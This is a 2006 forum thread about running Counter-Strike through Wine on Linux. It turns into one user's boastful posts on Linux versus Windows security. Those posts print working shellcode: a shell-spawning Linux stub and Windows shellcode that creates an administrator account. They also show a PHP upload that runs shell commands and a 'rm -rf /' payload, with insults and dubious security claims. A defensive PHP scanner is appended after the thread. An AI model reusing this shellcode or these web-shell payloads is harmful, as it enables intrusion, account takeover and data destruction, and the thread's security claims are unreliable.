Anybody ever use Wine for Linux?



blue toxin
10-08-06, 01:32 AM
Anybody ever use Wine for Linux? Wine is a program which allows Windows applications to be used on Linux, and I'm trying to get Counterstrike to run on it. Unfortunately I can't even figure out how to install Counterstrike. Any idea what I run in terminal to make this happen?

Kiechi
10-08-06, 01:40 AM
Your best bet would be LT (Zarathu) or Tiay (I think).

I found this, it may prove useful.

http://www.cstrike-planet.com/tutorial/1/5

blue toxin
10-08-06, 04:03 AM
Someone told me that Cedega is geared more for gaming while Wine is geared more for regular applications. So I'm going to give Cedega a try, maybe its interface will be different and easier to manipulate.

With Wine I don't think there's anything to "open." Someone told me I need to INSTALL Half Life through Wine. Go to the Terminal and type something like

Sudo apt-get install wine [setup.exe] or something like that. Setup.exe being the half life executable file.

I'll give Cedega a shot.

blue toxin
10-08-06, 04:12 AM
I tried that link, and everything went well until the very last step. I'm trying to install CS 1.6, and at the very end when I put the command line in to install it it paused for about 30 seconds then responded with "something updated, please retry command."

I just forget what that something was, but it was something to do with the terminal.

Kiechi
10-08-06, 04:22 AM
Unfortunately, you are talking to me in riddles. Like I said, you should wait for Zarathu or Tiay to come online. I'm sure one of them will be able to help you out. Sorry I couldn't help you out further.

King Zarathu
10-08-06, 05:56 AM
Yes, I'm familiar with Wine. However, Steam also comes with Linux installations--why do you need Wine? Also, what distro of Linux are you using?

Kiechi: Tiay doesn't know much about Linux.

Kiechi
10-08-06, 05:59 AM
> Yes, I'm familiar with Wine. However, Steam also comes with Linux installations--why do you need Wine? Also, what distro of Linux are you using?
>
> Kiechi: Tiay doesn't know much about Linux.

Well, I was half right.

King Zarathu
10-08-06, 06:16 AM
Also, depending on your distro, you might be able to use apt-get.


sudo apt-get update
sudo apt-get upgrade
sudo apt-cache search ***
Replace *** with what you're looking for.

Or, to make things easier...


sudo -s
apt-get update
apt-get upgrade
apt-cache search ***

blue toxin
10-08-06, 06:58 AM
I was wrong. I did get response. And via IM Zarathu helped. WOOOOOOOO

lilwing89
10-08-06, 02:22 PM
i don't get it. what are advantages you have to windows, when running a linux os?

King Zarathu
10-08-06, 03:16 PM
Linux has amazing features. Built-in port scanners, fingerprinters, etc... Also, you can get XGL with compiz, which gives you a 3D desktop rendered in OpenGL.

http://video.google.com/videoplay?docid=-7587965514994593432

^^ XGL.

===

Though, from a security standpoint, it's much easier to be insecure with Linux than with Windows.

blue toxin
11-08-06, 11:41 AM
Uh, you're telling me Windows is more secure?...


Reason I'm posting is for the life of me I cannot get this font installed. I got steam to work with wine but there's a problem. At the login screen of steam, there's no text. The reason is there's no font tahoma installed. So I have the font file. I HAVE IT. I put it in my font folder as instructed. Still, I get the same issues.

How do I install this font? I've been to every google site and forum known to man. This is ridiculous installing a font is this hard...

King Zarathu
11-08-06, 12:34 PM
> Uh, you're telling me Windows is more secure?...
Haha.. okay, you've got me started.

Yes, Windows is MUCH more secure than Linux, once everything is set up properly. Proper packages along with the proper service pack, you're all set. Let me explain.

It takes little shellcode to spawn shells and basically assrape Linux.


char shellcode[] =
"\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x 0c\x00\x00\x00"
"\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x 56\x0c\xcd\x80"
"\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\x e8\xd1\xff\xff"
"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\x c3";

void main() {
int *ret;

ret = (int *)&ret + 2;
(*ret) = (int)shellcode;

}
Simple, basic shellcode. If you understand basic programming, you understand that variable ret's pointer points at the return address to the casting of the char array "shellcode." Simple as ****. However, in order to write Windows shellcode, things get a little more complicated.


08048080 <_start>:
8048080: 31 c0 xor %eax,%eax
8048082: 31 db xor %ebx,%ebx
8048084: 31 c9 xor %ecx,%ecx
8048086: 31 d2 xor %edx,%edx

8048088: eb 37 jmp 80480c1

0804808a :
804808a: 59 pop %ecx
804808b: 88 51 0a mov %dl,0xa(%ecx)
804808e: bb 61 d9 e7 77 mov $0x77e7d961,%ebx
8048093: 51 push %ecx
8048094: ff d3 call *%ebx
8048096: eb 39 jmp 80480d1

08048098 :
8048098: 59 pop %ecx
8048099: 31 d2 xor %edx,%edx
804809b: 88 51 0b mov %dl,0xb(%ecx)
804809e: 51 push %ecx
804809f: 50 push %eax
80480a0: bb 32 b3 e7 77 mov $0x77e7b332,%ebx
80480a5: ff d3 call *%ebx
80480a7: eb 39 jmp 80480e2

080480a9 :
80480a9: 59 pop %ecx
80480aa: 31 d2 xor %edx,%edx
80480ac: 88 51 03 mov %dl,0x3(%ecx)
80480af: 31 d2 xor %edx,%edx
80480b1: 52 push %edx
80480b2: 51 push %ecx
80480b3: 51 push %ecx
80480b4: 52 push %edx
80480b5: ff d0 call *%eax

080480b7 :
80480b7: 31 d2 xor %edx,%edx
80480b9: 50 push %eax
80480ba: b8 fd 98 e7 77 mov $0x77e798fd,%eax
80480bf: ff d0 call *%eax

080480c1 :
80480c1: e8 c4 ff ff ff call 804808a
80480c6: 75 73 jne 804813b
80480c8: 65 gs
80480c9: 72 33 jb 80480fe
80480cb: 32 2e xor (%esi),%ch
80480cd: 64 fs
80480ce: 6c insb (%dx),%es:(%edi)
80480cf: 6c insb (%dx),%es:(%edi)
80480d0: 4e dec %esi

080480d1 :
80480d1: e8 c2 ff ff ff call 8048098
80480d6: 4d dec %ebp
80480d7: 65 gs
80480d8: 73 73 jae 804814d
80480da: 61 popa
80480db: 67 addr16
80480dc: 65 gs
80480dd: 42 inc %edx
80480de: 6f outsl %ds:(%esi),(%dx)
80480df: 78 41 js 8048122
80480e1: 4e dec %esi

080480e2 :
80480e2: e8 c2 ff ff ff call 80480a9
80480e7: 48 dec %eax
80480e8: 65 gs
80480e9: 79 4e jns 8048139


All of that shit gets shrunk down to a bitter:

char code[] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x37\x59\x88\x 51\x0a\xbb\x61\xd9"\
"\xe7\x77\x51\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x 0b\x51\x50\xbb\x32"\
"\xb3\xe7\x77\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x 03\x31\xd2\x52\x51"\
"\x51\x52\xff\xd0\x31\xd2\x50\xb8\xfd\x98\xe7\x77\x ff\xd0\xe8\xc4\xff"\
"\xff\xff\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x 4e\xe8\xc2\xff\xff"\
"\xff\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x 4e\xe8\xc2\xff\xff"\
"\xff\x48\x65\x79\x4e";
That is, if you want to construct an exploit for an overflowable buffer, or a stack to smash. You can just compile an EXE and do the shit from there.


char code[] = "\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x59\x53\x bb\x35\xfd\xe6\x77"\
"\xff\xd3\x31\xc0\x50\xbb\xfd\x98\xe7\x77\xff\xd3\x e8\xe0\xff\xff\xff"\
"\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x 65\x74\x20\x75\x73"\
"\x65\x72\x20\x55\x53\x45\x52\x4e\x41\x4d\x45\x20\x 50\x41\x53\x53\x57"\
"\x4f\x52\x44\x20\x2f\x41\x44\x44\x20\x26\x26\x20\x 6e\x65\x74\x20\x6c"\
"\x6f\x63\x61\x6c\x67\x72\x6f\x75\x70\x20\x41\x64\x 6d\x69\x6e\x69\x73"\
"\x74\x72\x61\x74\x6f\x72\x73\x20\x2f\x41\x44\x44\x 20\x55\x53\x45\x52"\
"\x4e\x41\x4d\x45\x4e";
That's an example of shellcode that will add an administrative account.

But this is basic ASM, requiring a payload after an exploit is found and used.


Furthermore, you only have two different versions of Windows. You have win32 and win64, win64 being for the 64 bit platform. You have many versions of Linux, and you would think that this would allow people to focus more on writing Windows shellcode? Think again.

http://www.milw0rm.com/shellcode/all

With all of the Linux operators on Intel x86 chips, along with AMD, etc... Plus, almost all servers that get hacked operate off of Linux. That's another reason you should use Windows applications. There are fewer of them that can get exploited when listening for a socket connection. FTP servers are a classic example. Google "ftp exploit," look at the OS the FTP server operates on, and you'll get my point.


Disagree with me == wrong

blue toxin
11-08-06, 12:42 PM
Good joke.

King Zarathu
11-08-06, 12:43 PM
Hahaha okay then.... Don't believe me. :P

CherriBlossomGirl
12-08-06, 04:25 PM
oh dear god, i swear you guys are speaking another language. I don't think I got any of that, except that there's something for linux called Wine. Why would they call it wine anyway?

King Zarathu
12-08-06, 11:06 PM
Heh.. it's okay. This asshole has already proven his extreme insecurity because he might be able to learn something from a 16 year old.

Say you have an FTP server.

You might want to check whether or not you're using Pro-FTPD or Pure-FTPD (definitely not Free-FTPD, since that's asking to be rooted). Oh, that's another thing... It's called ROOTING the box because only Linux/BSD/BSDI has the "ROOT" user.

Better idea!

Upload a file called "jigga.php."


<?php

shell_exec("adduser jiggaplz" /* more parameters in here */); ?>
Then, you have a remote shell on the other computer. Assuming that it's an Intel x86 chip, you do what you'll probably learn in your cyber security class as "local privilege escalation."

http://www.milw0rm.com/exploits/2011
^^^ Local Root Exploit

Would you not be ****ed? Yes, yes you would be.... Right, but say you don't have SSH.


<?php
shell_exec("rm -rf /");
?>

If you know your bash properly, you'll know that's really not a good thing either.

Oh, I almost forgot. How do you get these PHP codes to execute? View them in your browser, you ****ing dolt.
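
A defender-side check for the upload scenario in the last post, added here as an example and not part of the thread: it scans a web-served upload directory for PHP files that call command-execution functions such as the `shell_exec` in `jigga.php`. The function list, the file extensions and the sample files are assumptions constructed for the example.

```python
import re
import tempfile
from pathlib import Path

# PHP functions that run an OS command (list is an assumption, extend as needed).
EXEC_FUNCS = ("shell_exec", "exec", "system", "passthru", "popen", "proc_open")
# Skip method calls ($pdo->exec, Foo::exec) and longer names such as curl_exec.
CALL_RE = re.compile(r"(?<![\w$>:])(" + "|".join(EXEC_FUNCS) + r")\s*\(", re.I)
# String literals and comments, blanked before matching to avoid false hits.
TOKEN_RE = re.compile(
    r'''"(?:\\.|[^"\\])*"|'(?:\\.|[^'\\])*'|/\*.*?\*/|//[^\n]*|#[^\n]*''', re.S)
PHP_EXTS = {".php", ".phtml", ".php5"}


def find_exec_calls(source):
    """Return [(line_number, function_name)] for command-execution calls."""
    # Replace strings/comments with spaces but keep newlines for line numbers.
    cleaned = TOKEN_RE.sub(lambda m: re.sub(r"[^\n]", " ", m.group()), source)
    return [(cleaned.count("\n", 0, m.start()) + 1, m.group(1).lower())
            for m in CALL_RE.finditer(cleaned)]


def scan_upload_dir(root):
    """Map file name -> hits for every PHP file under an upload directory."""
    findings = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in PHP_EXTS:
            hits = find_exec_calls(path.read_text(errors="replace"))
            if hits:
                findings[path.name] = hits
    return findings


# Constructed sample files; jigga.php mirrors the snippet quoted in the thread.
SAMPLES = {
    "jigga.php": '<?php\n\nshell_exec("adduser jiggaplz" /* more parameters in here */); ?>\n',
    "gallery.php": '<?php\n// shell_exec() was removed\n$pdo->exec("DELETE FROM t");\necho "system(";\n',
    "notes.txt": "shell_exec(1) appears here, but this is not a PHP file\n",
}


def demo():
    with tempfile.TemporaryDirectory() as tmp:
        for name, body in SAMPLES.items():
            Path(tmp, name).write_text(body)
        return scan_upload_dir(tmp)


if __name__ == "__main__":
    print(demo())
```

A scan like this only catches direct calls; listing these functions in PHP's `disable_functions` setting and keeping FTP-writable directories out of the PHP handler removes the execution path itself.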